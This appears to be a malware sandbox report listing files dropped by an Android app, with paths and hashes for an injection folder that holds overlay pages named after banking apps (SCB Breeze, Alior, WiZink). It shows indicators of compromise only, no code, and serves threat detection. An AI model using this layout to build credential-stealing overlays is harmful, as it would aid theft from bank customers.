    95e1de73a3a7eb0f56cd2032aa009c92044c84e29ffe5b99395bc809410f9fb07d721061fe8cc3948d8b42eaae162297028a193249c8c0a300a00f52d74cc80a

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/cache/classes.zip
    Filesize

    1.3MB

    MD5

    2cb70b31197da01f8e3add72b19a63a8

    SHA1

    2501038d369eb7fdccfa54b4f118f7ac29b6533e

    SHA256

    3afede23b5fa8faab1dc26d613b14a313fec38346344d92fc9d5b7321b704f5d

    SHA512

    f5988394dd5564b0686f7d30318aa2e8db9a17601a8fa2b0a21b5569e736388af1e6a7995232218d03f8546962903f2f6052c7cf1821c267515e451578116617

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/files/injFolder/inj/air.app.scb.breeze.android.main.sg.prod/air.app.scb.breeze.android.main.sg.prod.png
    Filesize

    11KB

    MD5

    3cefb3e302a7ee29c1662a2411da88bf

    SHA1

    c112e2f3f659ab22799ddd9700869caa78923229

    SHA256

    888e6a543ac03335b1faaaab4d4b118d9fb6849c6f9952a27054c7a82ea25650

    SHA512

    43c5d1a6506aa2fc5c49ecc6c0876bfccc92c4276a012dc6b22bd32631d1c15af158596f6b0d8a86045e8f248e888ae77d65559d9db6ece98f1f17713fe42a9c

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/files/injFolder/inj/air.app.scb.breeze.android.main.sg.prod/index.html
    Filesize

    68KB

    MD5

    05510e32ce26b7b0b67030181c765c08

    SHA1

    fd9857a023e9f4aa134215f37b0075daba91119c

    SHA256

    58a2f9641aeaf83f135e59fb339118a5d875443505d0cbadcfbffb74492f70c1

    SHA512

    c0a22a291c8f307f498cef2dff0e40a44827785b2011fa33662b2c3609a6f943d4f70a55c08752ea306fb3147ebd8c758ed7eac436128c07b4c2fd52127ef001

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/files/injFolder/inj/alior.bankingapp.android/alior.bankingapp.android.png
    Filesize

    29KB

    MD5

    ffef7444a03c7626f338a8496a9da977

    SHA1

    d2d9748d3fd38bfd8d72f9eea1307712c8e3752d

    SHA256

    5013ca90ce41eff519081880f10c2066539373cbde8e6a43053a9e267e3762d5

    SHA512

    c4df75c8114ffd23b071171a5d11c8d2081eb01444fb6ab909fe44128f03fe4cdf7df7d1865813379b258ec08e3a09c6ed097fc43d00f02296fd779e20185c72

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/files/injFolder/inj/alior.bankingapp.android/index.html
    Filesize

    20KB

    MD5

    bb031055ee15a0125d4e55ca14d10f32

    SHA1

    4f689615aaf2b18e89827fd54e52250c901664e1

    SHA256

    b535bdcb2f62785bed418a6402d46b8840a101a2acb4b24bcb20911cdf086548

    SHA512

    47ea5781cab2c694e44eb195dcc00eacba19680e5e65f5f0e64cb3958afb7cf40e3c1770c7330dc3bd3be45e2ac54d53999cd9904a7f9f9a51b394d666e85046

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/files/injFolder/inj/app.wizink.es/app.wizink.es.png
    Filesize

    9KB

    MD5

    dc48e7685d1d05c78a1aedadd52de631

    SHA1

    ea9df21b3cf144395dc9ec3c9bba6cbd209520ee

    SHA256

    8bb9a0988ef5dcc90ffc2d1b7c3a14229c9985e2b35dc773e4838040080ec9a0

    SHA512

    40f7b9b1b42002ad1c87dab6e6ca325082224067deb7a0ee05b7724c66ecc6f4c66367b113dc2a37001ba9d7cef873fd6ab5a7704d7b969e027d821bb6820273

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/files/injFolder/inj/app.wizink.es/index.html
    Filesize

    27KB

    MD5

    b62296f1355e5cfe13c1bb447556ab93

    SHA1

    3fc58b7163e1364b9fbe7ca4f55c70442629de76

    SHA256

    3dc4cffdf7a2d665cb442746d7e1c27addcad5f18ead2830b3ac27553d543fae

    SHA512

    90a89cc647dad37f54db6e5146602764838b686cce07f2112e17937e408d121529a66e7dd5001c0858c76631089feeffe671b426bf3fecb3668c6428c30e82f8

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.